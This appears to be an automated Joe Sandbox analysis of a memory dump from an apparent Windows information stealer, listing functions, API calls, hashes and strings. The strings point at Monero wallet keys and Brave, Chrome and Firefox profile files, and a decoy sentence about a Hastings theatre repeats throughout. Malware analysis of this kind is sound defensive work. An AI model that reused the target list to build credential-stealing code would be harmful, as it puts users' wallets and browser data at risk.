The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003446D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003445D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003446AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003446CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003445DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003446C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003445C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0034466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003446B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344765

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: 982e2d2814c3c390f3ee7eadb28be2390051e84878460a318c16058287e08eb4
Instruction ID: 33d6cb6d49da448c8e151285a3074dab7c86c2a2096c8c87311d4e089515ed0c
Opcode Fuzzy Hash: 982e2d2814c3c390f3ee7eadb28be2390051e84878460a318c16058287e08eb4
Instruction Fuzzy Hash: ED410B607C664CFEC736BBA4A8EEEDDBB565F53B04F6098D8E80256284CBB27510C521

Function 0034BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

FindFirstFileA.KERNEL32(00000000,?,00360B32,00360B2B,00000000,?,?,?,003613F4,00360B2A), ref: 0034BEF5
StrCmpCA.SHLWAPI(?,003613F8), ref: 0034BF4D
StrCmpCA.SHLWAPI(?,003613FC), ref: 0034BF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 0034C7BF
FindClose.KERNEL32(000000FF), ref: 0034C7D1

Strings

Preferences, xrefs: 0034C11E
Brave, xrefs: 0034C102
Google Chrome, xrefs: 0034C634
\Brave\Preferences, xrefs: 0034C1DB

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: c5f5f91881673f492eda87f68272c23292e18eb4a91d4ece973228df50672751
Instruction ID: b6c4b0df0da5c36b486c2e7d07bc5727c2b96897120ed72455de16721797ead4
Opcode Fuzzy Hash: c5f5f91881673f492eda87f68272c23292e18eb4a91d4ece973228df50672751
Instruction Fuzzy Hash: 844275719101089BDB16FBB0DC56EED777CAB54301F404658FD06AA0A1EF34AB4DEBA2

Function 00354910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0035492C
FindFirstFileA.KERNEL32(?,?), ref: 00354943
StrCmpCA.SHLWAPI(?,00360FDC), ref: 00354971
StrCmpCA.SHLWAPI(?,00360FE0), ref: 00354987
FindNextFileA.KERNEL32(000000FF,?), ref: 00354B7D
FindClose.KERNEL32(000000FF), ref: 00354B92

Strings

%s\*, xrefs: 00354920
%s\%s, xrefs: 003549A4
%s\%s, xrefs: 003549FB

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: c4e11ae56eb166797b0822391426926f5361bf0b249643c5f5ac612f480339a0
Instruction ID: d0a44581778ecfcd9a958c788cdf9f63c21507853d497a6a3bc6eabc747019a2
Opcode Fuzzy Hash: c4e11ae56eb166797b0822391426926f5361bf0b249643c5f5ac612f480339a0
Instruction Fuzzy Hash: E1619A71900208ABDB25EFA0DC45FEA737CFB58301F048589F909A6054EB74EB89DFA1

Function 00353EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00353EC3
FindFirstFileA.KERNEL32(?,?), ref: 00353EDA
StrCmpCA.SHLWAPI(?,00360FAC), ref: 00353F08
StrCmpCA.SHLWAPI(?,00360FB0), ref: 00353F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 0035406C
FindClose.KERNEL32(000000FF), ref: 00354081

Strings

%s\%s, xrefs: 00353EB7

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: c366e369ae682a04bf274baa2644c05cf1c06abf034d575d1d5458836b853ed7
Instruction ID: 4521daf7041de2627f8036a2b8e21248d555c577eb67188a48c429b955a89d72
Opcode Fuzzy Hash: c366e369ae682a04bf274baa2644c05cf1c06abf034d575d1d5458836b853ed7
Instruction Fuzzy Hash: 66517CB2900218ABDB25FBB0DC45EEA737CBB54301F004589FA59A6050EB75EB8DDF61

Function 0034F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003615B8,00360D96), ref: 0034F71E
StrCmpCA.SHLWAPI(?,003615BC), ref: 0034F76F
StrCmpCA.SHLWAPI(?,003615C0), ref: 0034F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 0034FAB1
FindClose.KERNEL32(000000FF), ref: 0034FAC3

Strings

prefs.js, xrefs: 0034F812

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: c2aa0dff3bd964dd2996afd71f30331127a1cdb095c0dafd7af75574cecb5f4f
Instruction ID: ca260112845ce9ec7e0f4d34a4318cc71196c122a2b480de675a6e757445bbb1
Opcode Fuzzy Hash: c2aa0dff3bd964dd2996afd71f30331127a1cdb095c0dafd7af75574cecb5f4f
Instruction Fuzzy Hash: 4FB153719006189BDB25EF60DC56EEE7778AF54301F4082A8EC0A9E151EF306B4DEF92

Function 003416D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0036510C,?,?,?,003651B4,?,?,00000000,?,00000000), ref: 00341923
StrCmpCA.SHLWAPI(?,0036525C), ref: 00341973
StrCmpCA.SHLWAPI(?,00365304), ref: 00341989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00341D40
DeleteFileA.KERNEL32(00000000), ref: 00341DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00341E20
FindClose.KERNEL32(000000FF), ref: 00341E32

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Strings

\*.*, xrefs: 003417F1

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

